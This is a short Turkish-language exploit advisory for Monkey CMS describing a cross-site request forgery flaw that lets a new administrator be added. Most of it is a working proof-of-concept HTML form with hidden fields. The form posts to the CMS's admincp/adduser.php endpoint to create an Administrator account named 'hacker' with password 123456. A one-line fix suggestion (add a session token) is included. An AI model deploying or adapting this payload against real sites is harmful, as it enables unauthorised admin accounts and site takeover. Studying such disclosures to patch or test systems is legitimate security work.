< ------------------- header data start ------------------- >

#############################################################

# Application Name : Monkey CMS

# vulnerable Type : XSRF

# Infection : Yeni Admin Eklenebilir !

# Bug Fix Advice : Form’a Oturum Key’i (Session Token) eklenmelidir ..

# author : _iLLeqaL_ ~ Bug Researchers

#############################################################

< ------------------- header data end of ------------------- >

< -- bug code start -- >



<form action=http://demo.opensourcecms.com/monkey/admincp/adduser.php method=post>

<input type=hidden name=newusername value=hacker><br>

<input type=hidden name=password value=123456><br>

<input type=hidden name=password2 value=123456><br>

<input type=hidden name=active value=Administrator><br>

<input type=submit value=Tamam!>

</form>

< -- bug code end of -- >